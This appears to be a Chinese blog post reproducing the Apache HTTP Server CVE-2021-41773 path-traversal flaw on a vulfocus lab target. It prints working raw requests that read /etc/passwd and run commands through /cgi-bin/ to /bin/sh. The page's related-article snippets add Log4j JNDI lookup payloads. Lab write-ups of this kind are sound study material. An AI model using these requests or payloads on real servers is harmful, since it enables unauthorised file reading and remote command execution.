vulfocus——apache(cve_2021_41773)

最新推荐文章于 2025-02-08 22:04:16 发布
最新推荐文章于 2025-02-08 22:04:16 发布
阅读量1.4k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: vulfocus复现 文章标签: html 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_62063669/article/details/127000344
本文详细介绍了Apache HTTP Server 2.4.49和2.4.50版本存在的路径穿越漏洞,攻击者可借此读取敏感文件甚至执行命令。通过复现步骤,展示了如何进行文件读取和命令执行,揭示了该漏洞的严重性。修复此问题对于保障服务器安全至关重要。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

描述

Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。

攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护(默认禁用),则这些恶意请求就会成功。除此之外,该漏洞还可能会导致泄漏 CGI 脚本等解释文件的来源。 

复现

1.打开靶场

2.文件读取,用burp抓包然后发送请求

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 123.58.224.8:15826
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1661606197,1663322124; csrf_2698a4=b425a1c9; _ga=GA1.1.2104325447.1662173640; s7t_visitedfid=2; BOg8_2132_saltkey=QzYq2Yi9; BOg8_2132_lastvisit=1663245404; think_template=default
Upgrade-Insecure-Requests: 1

 

 3.rce命令执行

POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 123.58.224.8:15826
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1661606197,1663322124; csrf_2698a4=b425a1c9; _ga=GA1.1.2104325447.1662173640; s7t_visitedfid=2; BOg8_2132_saltkey=QzYq2Yi9; BOg8_2132_lastvisit=1663245404; think_template=default
Upgrade-Insecure-Requests: 1
Content-Length: 8

echo; id

 

4.上述执行成功,ls /tmp找到flag

 

Apache HTTP Server漏洞(CVE-2021-41773
weixin_44769042的博客
10-26 6203
漏洞复现记录--1 搭建环境 容器可以直接从DockerHub使用 dockerpullblueteamsteve/cve-2021-41773:no-cgid 使用: dockerrun-dit-p8080:80blueteamsteve/cve-2021-41773:no-cgid 访问:ip:8080
CVE-2021-44228——Log4j2-RCE漏洞复现
「 虚幻私塾」
01-20 780
Python微信订餐小程序课程视频 https://edu.youkuaiyun.com/course/detail/36074 Python实战量化交易理财系统 https://edu.youkuaiyun.com/course/detail/35475 0x00 漏洞介绍 Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。 影响版本:Apache Log4j2 2.0-beta9 - 2.15.0(不包括安全版本 2.12.2、2.12.3 和 2.3
[GFCTF 2021]Baby_Web的CVE-2021-41773
Aiwin的博客
06-05 1739
[GFCTF 2021]Baby_Web的CVE-2021-41773
CVE-2021-41773目录穿越漏洞复现并利用得到flag
随心所欲不逾矩
10-08 948
绕过程序对路径穿越符的检测,从而读取位于 Apache 服务器 web 目录以外的其他文件,或者读取 web 目录中的脚本文件源码,或者在开启了 cgi 或 cgid 的服务器上执行任意命令。在 Apache HTTP Server 2.4.49 版本中,在对用户发送的请求中的路径参数进行规范化时,其使用的。字符时,若其紧跟的两个字符是十六进制字符,则程序会对其进行 url 解码,将其转换成标准字符,如。形式,程序就不会将其检测为路径穿越符。给我的返回的是400,不可行,应该是做了限制,另辟蹊径。
【路径穿越】vulfocus/apache-cve_2021_41773
wj33333的博客
11-16 493
利用网上爆出得poc代码尝试获取/etc/passwd中得内容,poc如下,可轻松得到敏感内容。查看/tmp/flag
【漏洞复现-Apache-目录穿越文件读取-RCE】vulfocus/apache(cve_2021_41773)
10-07 2502
Apache-目录穿越文件读取-RCE】
vulfocus靶场名称: apache-cve_2021_41773/apache-cve_2021_42013
没有故事
04-19 738
Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。目录遍历:GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd。1:get:在url后面加上。远程代码执行:bp抓包。
vulfocus apache-cve_2021_41773 漏洞复现
XXokok的博客
11-26 730
vulfocus apache-cve_2021_41773 漏洞复现
CVE-2016-4437 Shiro反序列化漏洞复现
weixin_45260839的博客
05-15 3039
CVE-2016-4437 Shiro反序列化漏洞复现
Apache Solr RCE (CVE-2020-13957)未授权上传漏洞 + Velocity模板远程执行(CVE-2019-17558)复现
ximo的博客
04-28 621
漏洞概述 (CVE-2020-13957)未授权上传漏洞: 在特定的Solr版本中ConfigSet API存在未授权上传漏洞 ,配合CVE-2019-17558可执行任意命令。 (CVE-2019-17558)Velocity模板远程执行: 攻击者在知道Solr服务器上Core名称后,先把params.resource.loader.enabled设置为true(就可加载指定资源),再进行远程执行命令。 配合CVE-2020-13957上传漏洞上传Core,进行攻击。 影响版本 CVE-2020-1395
vulfocus::rocket:Vulfocus是一个扩展集成平台,将打破环境docker合并,放入即可使用,开箱即用
02-02
欢迎来到Vulfocus :rocket: Vulfocus是一个突破集成平台,将突破环境docker扩展,投入即用,开箱即用。 Vulfocus官网: ://fofapro.github.io/vulfocus/ 在线演示: : 背景 进攻靶场是目前每个安全人员以及想学习信息安全的人必备的东西,但目前商业化产品居多,还有一些类似的dvwa,sqli-labs这类的开源项目,但破坏环境比较固定,使用完一次后就失去其作用。建造的成本过高,每次启动的流程会比较繁琐,甚至很多场景是不满足的,之前关于突破性的环境耦合使用多的是vulhub,但是作为企业,高校等以及相关的培训,单纯的突破环境不一定能满足使用的需求,所以我们基于当下的一些靶场项目做出了一些小的改进来符合我们的一些需求,从而增加了标志的形式,来满足一些考核与验证的需求,可以对我们内部人员能力进行考核,于是Vulfocus就诞生了。 认识Vulfocus 因为Vulfocus一个突破性的集成平台,所以可以无限向里添加裂缝环境没有限制,而是是你的内存足够大。破坏下一无法启动的现象。 Vulfocus的docker仓库 Vu
webmin远程命令执行漏洞(CVE-2019-15107)
weixin_51387754的博客
10-22 2133
简介(what and why) Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作 http://www.webmin.com/ Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。 是一个基于Web的界面,用于Unix的系统管理。使用任何支持表和表单的浏览器,可以设置用户帐户,Apache,DNS,文件共享等。 HOW:Linux系统因其高效稳定而受到广大用户的推崇与青睐,然后其管理有一定复杂性和学习周期。为了
Apache Shiro 身份认证绕过漏洞(CVE-2022-32532)漏洞复现
qq_36584013的博客
06-30 2975
Apache Shiro 身份认证绕过漏洞(CVE-2022-32532)漏洞复现 0x01 漏洞简介 ​ Apache Shiro 是一个强大且易用的 Java 安全框架,通过它可以执行身份验证、授权、密码和会话管理。使用 Shiro 的易用 API,您可以快速、轻松地保护任何应用程序 —— 从最小的移动应用程序到最大的 WEB 和企业应用程序。 0x02 环境准备 vulfocus 靶场 h...
CVE-2021-41773
Dikesi的博客
02-08 674
Apache HTTP Server 路径穿越漏洞
Apache——CVE-2021-41773
qq_45770644的博客
10-06 3866
前言: Apache Software 已迅速发布了针对 Apache HTTP Server 中的零日安全漏洞的修复程序,该漏洞于上周首次报告给该项目。该漏洞正在野外被积极利用,它表示,并可能允许攻击者访问敏感信息。 CVE-2021-41773可能允许路径遍历和随后的文件泄露。路径遍历问题允许未经授权的人访问 Web 服务器上的文件,方法是欺骗 Web 服务器或在其上运行的 Web 应用程序返回存在于 Web 根文件夹之外的文件。 该问题仅影响 Apache 开源 Web 服务器的 2.4.49.
CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现
weixin_45260839的博客
06-03 6382
CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现
apache-cve_2021_41773 复现
YouthBelief的博客
11-05 1833
apache-cve_2021_41773 复现apache-cve_2021_41773 复现0x01 漏洞描述0x02 影响范围0x03 漏洞复现手工复现0x04 漏洞修复 apache-cve_2021_41773 复现 Apache HTTP Server是一个开源、跨平台的Web服务器,它在全球范围内被广泛使用。 0x01 漏洞描述 2021年10月5日,Apache发布更新公告,修复了Apache HTTP Server2.4.49中的一个路径遍历和文件泄露漏洞(CVE-2021-41773)。
【漏洞复现】CVE-2021-41773
qq_70836100的博客
08-06 420
该漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录 Require all granted允许被访问的的情况下(默认开启),攻击者可利⽤该路 径穿越漏洞读取到Web⽬录之外的其他⽂件。Apache HTTP Server 2.4.49 某些Apache HTTPd 2.4.50也存在此漏洞。在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)
Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )
qq_59975439的博客
06-10 7250
Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )
命令执行漏洞复现使用dnslog
最新发布
02-13
### 复现命令执行漏洞并使用DNSLog进行验证 #### 实验环境搭建 为了复现Apache Log4j2远程代码执行漏洞(CVE-2021-44228),可以采用Docker技术来快速构建所需的实验环境。具体操作为拉取已准备好的镜像`vulfocus/log4j2-rce-2021-12-09:latest`,并通过指定端口映射启动容器[^4]。 ```bash docker pull vulfocus/log4j2-2021-12-09:latest sudo docker run -itd -p 8080:8080 vulfocus/log4j2-rce-2021-12-09 ``` 确认服务正常运行后,可通过浏览器访问对应的IP地址与端口号组合(例如:http://192.168.71.128),以此检验部署是否成功。 #### 利用DNSLog验证漏洞存在性 当目标应用基于受影响版本的Log4j库处理日志记录时,如果输入被不当解析,则可能触发此漏洞。为了检测是否存在可利用条件,建议通过Burp Suite或其他HTTP代理工具拦截请求,并修改参数值以嵌入特定模式字符串作为测试载荷。这些特殊构造的数据应当指向预先注册的一个公共或自建的DNSLog服务器域名部分,以便于追踪由潜在反序列化活动引发的外部网络连接尝试。 假设已经设置好了监听机制,那么接下来就是调整待测Web应用程序接收到的数据流中的某些字段——比如URL查询串里的某个键名或是POST消息体内的表单项标签——使其携带精心设计过的表达式样式的字符序列。一旦上述改动生效并向服务器发出新的询问动作之后,便可在DNSLog平台上观察是否有异常解析事件发生;若有,则说明很可能遭遇到了不受信任源码所控制下的任意指令调用风险。 对于具体的payload形式而言,考虑到不同场景下变量命名规则差异较大,这里仅给出一种通用思路供参考: `${jndi:ldap://${dnslog}/a}` 或者 `${${lower:j}ndi:${lower:l}${lower:d}ap://${dnslog}}/a}` 其中`${...}`表示JNDI查找语法结构的一部分,而`${dnslog}`则需替换成为实际使用的DNS回调站点主机名[^5]。 #### 关联问题
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值